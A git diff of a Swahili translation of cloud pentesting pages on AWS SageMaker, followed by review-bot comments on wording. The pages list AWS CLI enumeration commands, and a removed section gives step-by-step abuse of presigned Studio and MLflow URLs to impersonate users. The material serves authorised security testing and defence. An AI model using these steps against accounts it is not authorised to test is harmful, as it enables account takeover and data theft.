--- a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md 
@@ -4,29 +4,29 @@ ## Muhtasari wa Huduma -Amazon SageMaker ni jukwaa iliyoendeshwa na AWS ya machine-learning ambayo inaunganisha notebooks, miundombinu ya training, orchestration, registries, na managed endpoints. Kuingiliwa kwa rasilimali za SageMaker kwa kawaida kunatoa: +Amazon SageMaker ni jukwaa la AWS la managed machine-learning linalounganisha notebooks, training infrastructure, orchestration, registries, na managed endpoints. Kukamatwa kwa rasilimali za SageMaker kwa kawaida kunatoa: -- IAM execution roles za muda mrefu zenye upatikanaji mpana wa S3, ECR, Secrets Manager, au KMS. -- Upatikanaji wa seti za data nyeti zilizohifadhiwa katika S3, EFS, au ndani ya feature stores. -- Vifunguo vya mtandao ndani ya VPCs (Studio apps, training jobs, endpoints). -- Presigned URLs zenye ruhusa za juu ambazo zinaweza kupita console authentication. +- Roles za utekelezaji za IAM zenye maisha marefu na ufikiaji mpana wa S3, ECR, Secrets Manager, au KMS. +- Ufikiaji wa datasets nyeti zilizohifadhiwa kwenye S3, EFS, au ndani ya feature stores. +- Footholds za mtandao ndani ya VPCs (Studio apps, training jobs, endpoints). +- Presigned URLs zenye kiwango cha juu cha ruhusa zinazopita authentication ya console. -Kuelewa jinsi SageMaker ilivyojengwa ni muhimu kabla ya kufanya pivot, persist, au exfiltrate data. +Kuelewa jinsi SageMaker imejengwa ni muhimu kabla ya pivot, persist, au exfiltrate data. -## Vipengele vya Msingi +## Core Building Blocks -- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Kila domain ina mfumo wa faili wa EFS unaoshirikiwa na default execution role. -- **Notebook Instances**: Managed EC2 instances kwa notebooks huru; hutumia execution roles tofauti. -- **Training / Processing / Transform Jobs**: Containers za muda mfupi zinazovuta code kutoka ECR na data kutoka S3. -- **Pipelines & Experiments**: Orchestrated workflows ambazo zinaelezea hatua zote, inputs, na outputs. 
+- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Kila domain ina sistema ya faili ya shared EFS na default execution role. +- **Notebook Instances**: Managed EC2 instances kwa notebooks standalone; hutumia execution roles tofauti. +- **Training / Processing / Transform Jobs**: Containers za ephemeral zinazovuta code kutoka ECR na data kutoka S3. +- **Pipelines & Experiments**: Workflows za orchestration zinazoeleza hatua zote, inputs, na outputs. - **Models & Endpoints**: Artefacts zilizopakizwa zinazotumika kwa inference kupitia HTTPS endpoints. - **Feature Store & Data Wrangler**: Managed services kwa maandalizi ya data na usimamizi wa features. -- **Autopilot & JumpStart**: Automated ML na katalogi ya modeli zilizochaguliwa. -- **MLflow Tracking Servers**: MLflow UI/API iliyosimamiwa yenye presigned access tokens. +- **Autopilot & JumpStart**: Automated ML na catalogue ya models iliyorekebishwa. +- **MLflow Tracking Servers**: Managed MLflow UI/API zenye presigned access tokens. -Kila rasilimali ina rejea kwa execution role, maeneo ya S3, container images, na usanidi wa hiari wa VPC/KMS — rekodi zote hizi wakati wa enumeration. +Kila rasilimali inarejea execution role, S3 locations, container images, na configuration ya hiari ya VPC/KMS—zisikie zote wakati wa enumeration. -## Akaunti & Metadata ya Ulimwenguni +## Metadata ya Akaunti & Ulimwenguni ```bash REGION=us-east-1 # Portfolio status, used when provisioning Studio resources 
@@ -39,9 +39,9 @@ aws sagemaker list-models --region $REGION --query 'Models[].ExecutionRoleArn' - # Generic tag sweep across any SageMaker ARN you know aws sagemaker list-tags --resource-arn --region $REGION ``` -Tambua uaminifu wowote kati ya akaunti (cross-account trust) — kama execution roles au S3 buckets zenye external principals — na vikwazo vya msingi kama service control policies au SCPs. +Angalia chochote cross-account trust (execution roles or S3 buckets with external principals) na vikwazo vya msingi kama service control policies or SCPs. -## Domaini za Studio, Apps & Nafasi Zilizoshirikiwa +## Studio Domains, Apps & Shared Spaces ```bash aws sagemaker list-domains --region $REGION aws sagemaker describe-domain --domain-id --region $REGION @@ -60,14 +60,14 @@ aws sagemaker describe-space --domain-id --space-name --regi aws sagemaker list-studio-lifecycle-configs --region $REGION aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name --region $REGION ``` -Nini cha kurekodi: +Kile cha kurekodi: - `DomainArn`, `AppSecurityGroupIds`, `SubnetIds`, `DefaultUserSettings.ExecutionRole`. -- EFS iliyopachikwa (`HomeEfsFileSystemId`) na folda za nyumbani za S3. -- Lifecycle scripts (mara nyingi huwa na bootstrap credentials au push/pull code ya ziada). +- EFS iliyopachikwa (`HomeEfsFileSystemId`) na saraka za nyumbani za S3. +- Scripti za lifecycle (mara nyingi zinaweza kuwa na bootstrap credentials au code ya ziada ya push/pull). > [!TIP] -> Presigned Studio URLs zinaweza kupita uthibitishaji ikiwa zimepewa kwa wingi. +> Presigned Studio URLs zinaweza kupitisha uthibitisho ikiwa zimetolewa kwa upana. ## Notebook Instances & Lifecycle Configs ```bash 
@@ -80,9 +80,9 @@ Metadata ya notebook inaonyesha: - Role ya utekelezaji (`RoleArn`), ufikiaji wa moja kwa moja wa intaneti dhidi ya hali ya VPC pekee. - Maeneo ya S3 katika `DefaultCodeRepository`, `DirectInternetAccess`, `RootAccess`. -- Scripts za lifecycle kwa ajili ya credentials au persistence hooks. +- Script za lifecycle kwa ajili ya credentials au persistence hooks. -## Mafunzo, Usindikaji, Transform & Kazi za Batch +## Mafunzo, Usindikaji, Transform & Batch Jobs ```bash aws sagemaker list-training-jobs --region $REGION aws sagemaker describe-training-job --training-job-name --region $REGION @@ -93,14 +93,14 @@ aws sagemaker describe-processing-job --processing-job-name --region $REGI aws sagemaker list-transform-jobs --region $REGION aws sagemaker describe-transform-job --transform-job-name --region $REGION ``` -Chunguza kwa makini: +Chunguza: -- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – ni ECR images zipi zimewekwa. +- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – ni ECR images gani zimetumika. - `InputDataConfig` & `OutputDataConfig` – S3 buckets, prefixes, na KMS keys. -- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – baini msimamo wa mtandao au usimbaji. +- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – zinaamua msimamo wa mtandao au usimbaji. - `HyperParameters` inaweza leak siri za mazingira au connection strings. -## Mifereji, Experimenti & Majaribio +## Pipelines, Experiments & Trials ```bash aws sagemaker list-pipelines --region $REGION aws sagemaker list-pipeline-executions --pipeline-name --region $REGION 
@@ -110,9 +110,9 @@ aws sagemaker list-experiments --region $REGION aws sagemaker list-trials --experiment-name --region $REGION aws sagemaker list-trial-components --trial-name --region $REGION ``` -Maelezo ya pipeline yanaelezea kila hatua, majukumu yaliyohusishwa, picha za container, na variables za mazingira. Vipengele vya majaribio mara nyingi vinabeba URI za artefakti za mafunzo, logi za S3, na metrics zinazoashiria mtiririko wa data nyeti. +Ufafanuzi wa pipeline unaeleza kila hatua, majukumu yanayohusiana, container images, na environment variables. Vijenge vya jaribio mara nyingi vina training artefact URIs, logi za S3, na metrics zinazoweza kuashiria mtiririko wa data nyeti. -## Miundo, Mipangilio ya Endpoint & Endpoints Zilizowekwa +## Modeli, Mipangilio ya Endpoint & Endpoints Zilizowekwa ```bash aws sagemaker list-models --region $REGION aws sagemaker describe-model --model-name --region $REGION @@ -123,12 +123,12 @@ aws sagemaker describe-endpoint-config --endpoint-config-name --region $RE aws sagemaker list-endpoints --region $REGION aws sagemaker describe-endpoint --endpoint-name --region $REGION ``` -Maeneo ya kipaumbele: +Maeneo ya kuzingatia: -- URI za artefakti za modeli kwenye S3 (`PrimaryContainer.ModelDataUrl`) na container images za inference. -- Usanidi wa Endpoint data capture (S3 bucket, KMS) kwa ajili ya uwezekano wa log exfil. -- Multi-model endpoints zinazotumia `S3DataSource` au `ModelPackage` (kagua kwa cross-account packaging). -- Network configs na security groups zilizounganishwa na endpoints. +- URI za artefact za modeli za S3 (`PrimaryContainer.ModelDataUrl`) na inference container images. +- Usanidi wa kunasa data wa endpoint (S3 bucket, KMS) kwa ajili ya possible log exfil. +- Multi-model endpoints zinazotumia `S3DataSource` au `ModelPackage` (angalia cross-account packaging). +- Mipangilio ya network na security groups zilizoambatishwa kwa endpoints. ## Feature Store, Data Wrangler & Clarify ```bash 
@@ -143,11 +143,11 @@ aws sagemaker list-model-monitoring-schedule --region $REGION ``` Mambo muhimu ya usalama: -- Online feature stores hureplica data kwa Kinesis; angalia `OnlineStoreConfig.SecurityConfig.KmsKeyId` na VPC. -- Data Wrangler flows mara nyingi hujumuisha nenosiri za JDBC/Redshift au endpoints za kibinafsi. -- Clarify/Model Monitor jobs huweka data kwenye S3 ambayo inaweza kusomeka kwa umma au kupatikana kwa accounts nyingine. +- Online feature stores hunakili data kwa Kinesis; angalia `OnlineStoreConfig.SecurityConfig.KmsKeyId` na VPC. +- Data Wrangler flows mara nyingi huingiza kredensiali za JDBC/Redshift au private endpoints. +- Clarify/Model Monitor jobs hutoa data kwenda S3 ambayo inaweza kusomwa na mtu yeyote (world-readable) au kupatikana kwa akaunti nyingine (cross-account accessible). -## MLflow Tracking Servers, Autopilot & JumpStart +## MLflow Seva za Kufuatilia, Autopilot & JumpStart ```bash aws sagemaker list-mlflow-tracking-servers --region $REGION aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION 
@@ -158,15 +158,15 @@ aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION aws sagemaker list-jumpstart-models --region $REGION aws sagemaker list-jumpstart-script-resources --region $REGION ``` -- MLflow tracking servers store experiments and artefacts; presigned URLs can expose everything. -- Autopilot jobs spin multiple training jobs—enumerate outputs for hidden data. -- JumpStart reference architectures may deploy privileged roles into the account. +- Server za tracking za MLflow zinahifadhi experiments na artefacts; presigned URLs zinaweza kufichua kila kitu. +- Autopilot jobs huendesha training jobs nyingi—orodhesha outputs kutafuta data iliyofichwa. +- JumpStart reference architectures zinaweza kupeleka privileged roles ndani ya akaunti. -## IAM & Networking Considerations +## IAM & Mambo ya Mtandao -- Enumerate IAM policies attached to all execution roles (Studio, notebooks, training jobs, pipelines, endpoints). -- Check network contexts: subnets, security groups, VPC endpoints. Many organisations isolate training jobs but forget to restrict outbound traffic. -- Review S3 bucket policies referenced in `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` for external access. +- Orodhesha IAM policies zilizounganishwa na execution roles zote (Studio, notebooks, training jobs, pipelines, endpoints). +- Kagua muktadha wa mtandao: subnets, security groups, VPC endpoints. Mashirika mengi hutenganisha training jobs lakini kusahau kuzuia outbound traffic. +- Kagua S3 bucket policies zilizotajwa katika `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` kwa ufikiaji wa nje. ## Privilege Escalation 
@@ -192,7 +192,7 @@ aws sagemaker list-jumpstart-script-resources --region $REGION ../aws-sagemaker-unauthenticated-enum/README.md {{#endref}} -## References +## Marejeo - [AWS SageMaker Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/whatis.html) - [AWS CLI SageMaker Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/index.html) diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md index 0d575a5bb..a9ba1cd40 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md 
@@ -1,108 +1,13 @@ -# AWS - SageMaker Unauthorized Access +# AWS - SageMaker Ufikiaji Usioidhinishwa {{#include ../../../../banners/hacktricks-training.md}} -## SageMaker Studio - Account Takeover via CreatePresignedDomainUrl (Impersonate Any UserProfile) +## Presigned URLs for SageMaker -### Maelezo -Kitambulisho chenye ruhusa ya kupiga simu `sagemaker:CreatePresignedDomainUrl` kwenye lengwa la Studio `UserProfile` kinaweza kutengeneza URL ya kuingia ambayo inaingia moja kwa moja ndani ya SageMaker Studio kama profile hiyo. Hii inampa kivinjari cha mshambulizi kikao cha Studio kinachorithi ruhusa za `ExecutionRole` za profile na ufikiaji kamili wa nyumbani na apps za profile zilizo kwenye EFS. Hakuna `iam:PassRole` au console access inahitajika. +Ikiwa mshambuliaji ataweza kupata presigned URL ya rasilimali ya SageMaker, wanaweza kuifikia bila uthibitisho mwingine wowote. Idhini na kiwango cha ufikiaji vitaegemea role inayohusishwa na rasilimali: -### Mahitaji -- SageMaker Studio `Domain` na `UserProfile` lengwa ndani yake. -- Mhusika mshambulizi anahitaji `sagemaker:CreatePresignedDomainUrl` kwenye `UserProfile` lengwa (resource‑level) au `*`. 
- -Mfano wa sera ya chini kabisa (iliyoelekezwa kwa UserProfile mmoja): -```json -{ -"Version": "2012-10-17", -"Statement": [ -{ -"Effect": "Allow", -"Action": "sagemaker:CreatePresignedDomainUrl", -"Resource": "arn:aws:sagemaker:::user-profile//" -} -] -} -``` -### Hatua za Matumizi Mabaya - -1) Orodhesha Studio Domain na UserProfiles unazoweza kulenga -```bash -DOM=$(aws sagemaker list-domains --query 'Domains[0].DomainId' --output text) -aws sagemaker list-user-profiles --domain-id-equals $DOM -TARGET_USER= -``` -2) Tengeneza presigned URL (inayokuwa halali kwa takriban dakika 5 kwa chaguo-msingi) -```bash -aws sagemaker create-presigned-domain-url \ ---domain-id $DOM \ ---user-profile-name $TARGET_USER \ ---query AuthorizedUrl --output text -``` -3) Fungua URL iliyorejeshwa katika kivinjari ili kuingia kwenye Studio kama mtumiaji lengwa. Katika terminal ya Jupyter ndani ya Studio thibitisha kitambulisho cha ufanisi: -```bash -aws sts get-caller-identity -``` -Vidokezo: -- `--landing-uri` inaweza kuachwa. Baadhi ya thamani (mfano, `app:JupyterLab:/lab`) zinaweza kukataliwa kulingana na toleo la Studio; chaguo-msingi kawaida hurudisha kwenye ukurasa wa nyumbani wa Studio kisha kwenda Jupyter. -- Sera za shirika/vizuizi vya VPC endpoint vinaweza bado kuzuia ufikiaji wa mtandao; kutengeneza tokeni hakuhitaji kuingia kwenye console au `iam:PassRole`. - -### Athari -- Lateral movement and privilege escalation kwa kubadilisha kuwa yoyote Studio `UserProfile` ambayo ARN yake imeruhusiwa, ukirithi `ExecutionRole` yake na filesystem/apps yake. - -### Ushahidi (kutoka kwenye jaribio lililodhibitiwa) -- Kwa kuwa na `sagemaker:CreatePresignedDomainUrl` pekee kwenye `UserProfile` lengwa, roli ya mshambuliaji ilirejesha kwa mafanikio `AuthorizedUrl` kama: -``` -https://studio-d-xxxxxxxxxxxx.studio..sagemaker.aws/auth?token=eyJhbGciOi... 
-``` -- Ombi la moja kwa moja la HTTP linajibiwa kwa kurudishwa (HTTP 302) kuelekea Studio, likithibitisha kuwa URL ni halali na hai hadi liishe muda wake. - - -## SageMaker MLflow Tracking Server - ATO via CreatePresignedMlflowTrackingServerUrl - -### Maelezo -Shahsi mwenye idhini ya kuita `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwa target SageMaker MLflow Tracking Server anaweza kutengeneza URL ya matumizi ya mara moja (presigned) inayothibitisha moja kwa moja kwenye UI iliyosimamiwa ya MLflow kwa server hiyo. Hii inampa ufikiaji sawa na mtumiaji halali angekuwa nao kwa server (kuona/kuunda experiments na runs, na kupakua/kupakia artifacts katika S3 artifact store ya server) bila ufikiaji wa console au `iam:PassRole`. - -### Mahitaji -- SageMaker MLflow Tracking Server katika account/region na jina lake. -- Mshambuliaji (principal) anahitaji idhini ya `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwenye rasilimali ya MLflow Tracking Server lengwa (au `*`). - -Mfano wa sera ya chini kabisa (iliyopangwa kwa Tracking Server moja): -```json -{ -"Version": "2012-10-17", -"Statement": [ -{ -"Effect": "Allow", -"Action": "sagemaker:CreatePresignedMlflowTrackingServerUrl", -"Resource": "arn:aws:sagemaker:::mlflow-tracking-server/" -} -] -} -``` -### Hatua za Kutumia Vibaya - -1) Orodhesha MLflow Tracking Servers unaoweza target na chagua jina moja -```bash -aws sagemaker list-mlflow-tracking-servers \ ---query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}' -TS_NAME= -``` -2) Tengeneza presigned MLflow UI URL (inayotumika kwa muda mfupi) -```bash -aws sagemaker create-presigned-mlflow-tracking-server-url \ ---tracking-server-name "$TS_NAME" \ ---expires-in-seconds 300 \ ---session-expiration-duration-in-seconds 1800 \ ---query AuthorizedUrl --output text -``` -3) Fungua URL iliyorejeshwa kwenye kivinjari ili kufikia MLflow UI kama mtumiaji aliyethibitishwa kwa Tracking Server husika. 
- -Vidokezo: -- Tracking Server lazima iwe katika hali ya tayari (mfano, `Created/Active`). Ikiwa bado iko `Creating`, ombi litakataliwa. -- The presigned URL ni ya matumizi mara moja na ni ya muda mfupi; tengeneza mpya inapohitajika. - -### Athari -- Ufikiaji wa moja kwa moja wa MLflow UI iliyosimamiwa kwa Tracking Server lengwa, kuruhusu kutazama na kubadilisha experiments/runs na kupata au kupakia artifacts zilizohifadhiwa katika S3 artifact store iliyosanidiwa ya server, ndani ya ruhusa zinazotekelezwa na usanidi wa server. +{{#ref}} +../../aws-privilege-escalation/aws-sagemaker-privesc/README.md +{{#endref}} {{#include ../../../../banners/hacktricks-training.md}}
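Review bot: In aws-sagemaker-enum/README.md, hunk `@@ -4,29 +4,29 @@`, the sentence that closes the building-blocks list now reads `zisikie zote wakati wa enumeration` ("hear them all"), while the line it replaces said `rekodi zote hizi` ("record all of these"), so the instruction to the reader has changed meaning. Restore the verb, for example `zirekodi zote wakati wa enumeration`. The same hunk turns the translated heading `## Vipengele vya Msingi` back into English `## Core Building Blocks` while the headings around it (`## Muhtasari wa Huduma`, `## Metadata ya Akaunti & Ulimwenguni`) stay in Swahili; pick one convention for section headings and apply it across the file.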
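Review bot: In aws-sagemaker-enum/README.md, hunk `@@ -39,9 +39,9 @@`, the added sentence leaves English connectives inside Swahili prose: `(execution roles or S3 buckets with external principals)` and `service control policies or SCPs`. The removed line used `au` and `zenye` in those positions. Keep the AWS terms in English but translate the glue words, for example `execution roles au S3 buckets zenye external principals`, and drop one of `service control policies` / `SCPs`, since they name the same control.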
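Review bot: In aws-sagemaker-enum/README.md, hunk `@@ -60,14 +60,14 @@`, the TIP line now says `zinaweza kupitisha uthibitisho`, and `kupitisha` reads as "to pass or approve" rather than "to bypass"; the removed line had `kupita uthibitishaji`. The security point of the tip is that a presigned Studio URL bypasses authentication, so use `kupita` (or `kukwepa`) and keep `uthibitishaji` for "authentication". Minor: this hunk writes `Scripti za lifecycle` while hunk `@@ -80,9 +80,9 @@` writes `Script za lifecycle`; use one spelling.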
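Review bot: In aws-sagemaker-enum/README.md, hunk `@@ -143,11 +143,11 @@`, the heading `## MLflow Seva za Kufuatilia, Autopilot & JumpStart` translates an AWS service name that the rest of the patch renders two other ways: `**MLflow Tracking Servers**` in hunk `@@ -4,29 +4,29 @@` and `Server za tracking za MLflow` in hunk `@@ -158,15 +158,15 @@`. A reader searching for the service name, or matching it against `aws sagemaker list-mlflow-tracking-servers` in the code block directly below, will not find the translated form. Keep `MLflow Tracking Servers` untranslated in the heading and in the bullet.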
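Review bot: In aws-sagemaker-unauthenticated-enum/README.md, hunk `@@ -1,108 +1,13 @@`, the added heading `## Presigned URLs for SageMaker` is left in English under a translated page title, and the added sentence pairs the singular subject `mshambuliaji` with the plural verb `wanaweza kuifikia` (use `anaweza kuifikia`). The hunk also removes both worked sections on `sagemaker:CreatePresignedDomainUrl` and `sagemaker:CreatePresignedMlflowTrackingServerUrl`, including the minimal IAM policy examples and the notes on URL lifetime and single use, and leaves only a `{{#ref}}` to `aws-sagemaker-privesc/README.md`. For a commit labelled as a translation, confirm that the linked page carries that material in this language before merging, so the resource-scoping detail a defender needs for writing deny policies is not dropped from the translated book.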